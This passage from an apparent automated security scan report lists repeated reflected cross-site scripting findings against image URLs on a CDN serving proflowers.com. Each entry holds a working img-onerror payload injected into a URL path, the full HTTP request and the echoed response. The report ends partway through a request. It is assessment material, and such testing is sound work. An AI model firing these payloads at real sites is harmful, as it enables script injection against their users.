Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53 was submitted in the REST URL parameter 9. This input was echoed as e4e87<img src=a onerror=alert(1)>4b0efed6b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988be4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0085988be4e87<img src=a onerror=alert(1)>4b0efed6b53

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b was submitted in the REST URL parameter 9. This input was echoed as 2370a<img src=a onerror=alert(1)>c6102b76f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0087026b2370a<img src=a onerror=alert(1)>c6102b76f4b

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871 was submitted in the REST URL parameter 9. This input was echoed as 952f4<img src=a onerror=alert(1)>435cb415871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/P0102761b952f4<img src=a onerror=alert(1)>435cb415871

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607 was submitted in the REST URL parameter 9. This input was echoed as 966a9<img src=a onerror=alert(1)>283e49d607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img src=a onerror=alert(1)>283e49d607

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b was submitted in the REST URL parameter 9. This input was echoed as a9104<img src=a onerror=alert(1)>f43391f294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img src=a onerror=alert(1)>f43391f294b

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c was submitted in the REST URL parameter 9. This input was echoed as 9ac75<img src=a onerror=alert(1)>86b196c9e7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img src=a onerror=alert(1)>86b196c9e7c

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439 was submitted in the REST URL parameter 9. This input was echoed as 5af77<img src=a onerror=alert(1)>4d163bea439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:40 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img src=a onerror=alert(1)>4d163bea439

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c was submitted in the REST URL parameter 9. This input was echoed as dd160<img src=a onerror=alert(1)>8c6c0a1560c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img src=a onerror=alert(1)>8c6c0a1560c

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 81f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8 was submitted in the REST URL parameter 9. This input was echoed as 81f6d<img src=a onerror=alert(1)>5a8dda194a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img src=a onerror=alert(1)>5a8dda194a8

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d was submitted in the REST URL parameter 9. This input was echoed as da2a9<img src=a onerror=alert(1)>f9d94d0215d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img src=a onerror=alert(1)>f9d94d0215d

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30 was submitted in the REST URL parameter 9. This input was echoed as fdac5<img src=a onerror=alert(1)>8cb69ded30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img src=a onerror=alert(1)>8cb69ded30

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885 was submitted in the REST URL parameter 9. This input was echoed as 1cbee<img src=a onerror=alert(1)>5763a4a3885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img%20src%3da%20onerror%3dalert(1)>5763a4a3885?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000001125X_023117_W1_SQ1cbee<img src=a onerror=alert(1)>5763a4a3885

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6 was submitted in the REST URL parameter 9. This input was echoed as 74452<img src=a onerror=alert(1)>3add74ea4c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img%20src%3da%20onerror%3dalert(1)>3add74ea4c6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000009D209_087948_W1_SQ74452<img src=a onerror=alert(1)>3add74ea4c6

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20 was submitted in the REST URL parameter 9. This input was echoed as 9fe05<img src=a onerror=alert(1)>4969de73a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img%20src%3da%20onerror%3dalert(1)>4969de73a20?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:28 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009D183X_087921_W19fe05<img src=a onerror=alert(1)>4969de73a20

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33 was submitted in the REST URL parameter 9. This input was echoed as 4fef5<img src=a onerror=alert(1)>efadcde1f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img%20src%3da%20onerror%3dalert(1)>efadcde1f33?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF4fef5<img src=a onerror=alert(1)>efadcde1f33

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f was submitted in the REST URL parameter 9. This input was echoed as c2ba5<img src=a onerror=alert(1)>fbc47c0020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PFc2ba5<img%20src%3da%20onerror%3dalert(1)>fbc47c0020f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
